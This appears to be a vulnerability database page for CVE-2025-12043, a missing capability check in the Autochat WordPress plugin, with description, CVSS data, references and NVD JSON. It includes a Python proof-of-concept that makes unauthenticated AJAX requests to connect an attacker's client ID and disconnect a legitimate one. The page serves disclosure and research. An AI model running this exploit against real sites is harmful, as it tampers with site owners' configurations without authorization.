CVE-2025-12043

Description

The Autochat Automatic Conversation plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_nopriv_auycht_saveCid' AJAX endpoint in all versions up to, and including, 1.1.9. This makes it possible for unauthenticated attackers to connect and disconnect the client ID.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Autochat Automatic Conversation plugin for WordPress <= 1.1.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-12043 PoC
# Target: WordPress with Autochat Automatic Conversation plugin <= 1.1.9
# Vulnerability: Missing capability check on wp_ajax_nopriv_auycht_saveCid

target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com'
ajax_endpoint = f'{target_url}/wp-admin/admin-ajax.php'

# Payload to connect client ID
connect_payload = {
    'action': 'auycht_saveCid',
    'cid': 'attacker_controlled_client_id',
    'type': 'connect'
}

# Payload to disconnect client ID
disconnect_payload = {
    'action': 'auycht_saveCid',
    'cid': 'legitimate_client_id',
    'type': 'disconnect'
}

print('[+] CVE-2025-12043 PoC - Autochat Missing Authorization')
print(f'[+] Target: {target_url}')

# Test connect functionality
print('[*] Testing client connection...')
response = requests.post(ajax_endpoint, data=connect_payload)
print(f'[*] Status Code: {response.status_code}')
print(f'[*] Response: {response.text[:200]}')

# Test disconnect functionality
print('[*] Testing client disconnection...')
response = requests.post(ajax_endpoint, data=disconnect_payload)
print(f'[*] Status Code: {response.status_code}')
print(f'[*] Response: {response.text[:200]}')

print('[+] Exploitation complete - No authentication required')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12043
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12043
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12043/
[4] VulDB https://vuldb.com/cve/CVE-2025-12043
[5] https://wordpress.org/plugins/auyautochat-for-wp/
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/089b3a1b-0f4b-4ba5-85d8-c1f6b74fe7eb?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12043", "sourceIdentifier": "[email protected]", "published": "2025-11-25T08:15:48.157", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Autochat Automatic Conversation plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_nopriv_auycht_saveCid' AJAX endpoint in all versions up to, and including, 1.1.9. This makes it possible for unauthenticated attackers to connect and disconnect the client ID."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wordpress.org/plugins/auyautochat-for-wp/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/089b3a1b-0f4b-4ba5-85d8-c1f6b74fe7eb?source=cve", "source": "[email protected]"}]}}